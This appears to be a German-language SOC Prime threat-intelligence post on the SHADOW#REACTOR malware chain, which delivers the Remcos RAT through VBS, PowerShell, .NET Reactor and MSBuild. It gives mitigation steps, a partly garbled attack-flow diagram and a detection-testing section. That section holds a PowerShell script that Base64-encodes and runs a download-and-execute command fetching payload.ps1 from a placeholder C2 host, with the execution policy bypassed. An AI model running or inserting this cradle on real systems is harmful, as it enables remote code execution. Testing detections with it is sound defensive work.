SOC Prime Bias: Mittel

15 Jan. 2026 18:51
newspaper icon Securonix

SCHATTEN#REAKTOR – TEXT-NUREN-STAGING, .NET REAKTOR UND IN-MEMORY REMCOS RAT BEREITSTELLUNG

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
SCHATTEN#REAKTOR – TEXT-NUREN-STAGING, .NET REAKTOR UND IN-MEMORY REMCOS RAT BEREITSTELLUNG
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

SHADOW#REACTOR ist eine mehrstufige Windows-Malware-Kette, die einen verschleierten VBS-Launcher, einen auf PowerShell basierenden Downloader, textbasierte Staging-Artefakte, einen durch .NET Reactor geschützten Loader und eine MSBuild-Ausführung kombiniert, um letztendlich den Remcos-RAT (Remote Access Trojan) bereitzustellen.

Untersuchung

Forscher rekonstruierten den Ablauf, beginnend mit einem VBS-Skript, das von der Infrastruktur des Angreifers abgerufen wurde, gefolgt von PowerShell-Routinen, die gestagete Text-Payloads zusammenstellen und decodieren. Die Kette fährt fort mit reflektivem, im Speicher geladenem .NET-Assembly und einer abschließenden Übergabe an MSBuild, das die Ausführung des Remcos RAT auslöst. Der Bericht dokumentiert die textcodierten Komponenten, die Entschlüsselungslogik und die Persistenzmethoden, die verwendet werden, um den Zugang aufrechtzuerhalten.

Minderung

Erhöhen Sie die Überwachungsabdeckung für Skriptausführungsprogramme und Interpreten und verhindern Sie die Ausführung von VBS/PowerShell von benutzerbeschreibbaren Pfaden, wo immer möglich. Fügen Sie Erkennungen für verdächtigen ausgehenden HTTP-Verkehr zur identifizierten Infrastruktur, MSBuild-Missbrauch und reflektives .NET-Assembly-Laden hinzu. Überwachen Sie gängige Persistenzmuster, einschließlich Run-Key-Modifikationen und verknüpfungsbasierte Start-Einträge.

Reaktion

Wenn SHADOW#REACTOR-Aktivität bestätigt wird, isolieren Sie den Endpunkt und beenden Sie die gesamte Prozesskette (wscript.exe → powershell.exe → msbuild.exe). Entfernen Sie alle gestageten Textdateien und zugehörigen Registrierungseinträge und beheben Sie dies, indem Sie Remcos-Binärdateien und zugehörige Konfigurationsdateien löschen. Folgen Sie mit einer gründlichen forensischen Überprüfung, um zusätzliche Kompromittierungen zu erfassen und vollständige Ausmerzung zu gewährleisten.

„graph TB %% Class Definitions Section classDef technique fill:#ffe699 classDef builtin fill:#cccccc classDef malware fill:#ff9999 %% Node definitions tech_user_execution[„<b>Technik</b> – <b>T1204.002 Benutzer-Ausführung: Bösartige Datei</b><br/><b>Beschreibung</b>: Opfer führt eine bösartige Datei aus, die Code startet.“] class tech_user_execution technique tool_wscript[„<b>Werkzeug</b> – <b>Name</b>: wscript.exe<br/><b>Beschreibung</b>: Windows Script Host, verwendet zur Ausführung von VBScript-Dateien.“] class tool_wscript builtin tech_vbscript_interp[„<b>Technik</b> – <b>T1059.005 Befehls- und Skript-Interpreter: Visual Basic</b><br/><b>Beschreibung</b>: Führt Visual Basic-Skripte auf dem Hostsystem aus.“] class tech_vbscript_interp technique tech_powershell_interp[„<b>Technik</b> – <b>T1059.001 Befehls- und Skript-Interpreter: PowerShell</b><br/><b>Beschreibung</b>: Führt PowerShell-Befehle und -Skripte aus.“] class tech_powershell_interp technique tech_http_comm[„<b>Technik</b> – <b>T1071.001 Anwendungsschicht-Protokoll: Web-Protokolle</b><br/><b>Beschreibung</b>: Nutzt HTTP/HTTPS, um Payload-Fragmente von entfernten Servern herunterzuladen.“] class tech_http_comm technique tech_obfuscation[„<b>Technik</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/><b>Beschreibung</b>: Payload ist mit Base64, XOR kodiert und durch .NET Reactor geschützt.“] class tech_obfuscation technique tech_reflective_loading[„<b>Technik</b> – <b>T1620 Reflective Code Loading</b> / <b>T1574.014 Hijack Execution Flow: AppDomainManager</b><br/><b>Beschreibung</b>: Lädt ein .NET-Assembly über das Hijacking des AppDomainManager in den Speicher.“] class tech_reflective_loading technique tool_msbuild[„<b>Werkzeug</b> – <b>Name</b>: MSBuild.exe<br/><b>Beschreibung</b>: Vertrauenswürdiges Entwickler-Tool, missbraucht als LOLBin, um die letzte Phase zu starten.“] class tool_msbuild builtin malware_remcos[„<b>Malware</b> – <b>Name</b>: Remcos RAT<br/><b>Beschreibung</b>: Remote-Zugriffs-Trojaner, verwendet für Kommando und Kontrolle.“] class malware_remcos malware tech_shortcut_mod[„<b>Technik</b> – <b>T1547.009 Shortcuts Modifikation</b><br/><b>Beschreibung</b>: Erstellt eine LNK-Verknüpfung im Autostart-Ordner, um Persistenz zu erreichen.“] class tech_shortcut_mod technique %% Connections showing attack flow tech_user_execution u002du002d>|führt aus via| tool_wscript tool_wscript u002du002d>|führt aus| tech_vbscript_interp tech_vbscript_interp u002du002d>|ruft auf| tech_powershell_interp tech_powershell_interp u002du002d>|lädt Fragmente via| tech_http_comm tech_http_comm u002du002d>|baut Payload neu auf| tech_obfuscation tech_obfuscation u002du002d>|lädt in den Speicher via| tech_reflective_loading tech_reflective_loading u002du002d>|verwendet| tool_msbuild tool_msbuild u002du002d>|startet| malware_remcos malware_remcos u002du002d>|kann erstellen| tech_shortcut_mod „

Angriffsfluss

Simulation Ausführung

Voraussetzung: Der Telemetrie- & Basislinienvorflug-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Gegnertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und der Bericht MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Ein Angreifer mit begrenzten Laterale-Movement-Rechten möchte ein Remote-Payload auf einem kompromittierten Windows-Host ausführen, während er typische Script-Blockierungsabwehr umgeht. Dazu verwenden sie PowerShell mit -ExecutionPolicy Bypass um Ausführungsrichtlinienbeschränkungen zu ignorieren. Das bösartige Payload ist als Base64-kodierter String verschleiert, der bei Decodierung ein System.Net.WebClient Objekt erstellt, um ein PowerShell-Skript von einem C2-Server herunterzuladen und auszuführen. Diese Kombination erfüllt alle drei Erkennungskriterien (ExecutionPolicy Bypass, FromBase64String, System.Net.WebClient).

  • Regressionstest-Skript:

    #--------------------------------------------
# Simulierte bösartige PowerShell-Ausführung
#--------------------------------------------
# 1. Erstelle ein einfaches remotees Skript (nur für Demo)
$remoteScript = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://{C2_HOST}/payload.ps1")'
# 2. Kodieren Sie das Skript in Base64
$bytes = [System.Text.Encoding]::Unicode.GetBytes($remoteScript)
$b64   = [Convert]::ToBase64String($bytes)
# 3. Führen Sie mit ExecutionPolicy Bypass und FromBase64String aus
PowerShell -ExecutionPolicy Bypass -Command "
    $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64'));
    Invoke-Expression $decoded
"

  • Bereinigungsbefehle:

    # Entfernen Sie alle heruntergeladenen Nutzlasten und beenden Sie verbleibende PowerShell-Prozesse
Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'ExecutionPolicy Bypass'} | Stop-Process -Force
Remove-Item -Path "C:Temppayload.ps1" -ErrorAction SilentlyContinue

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten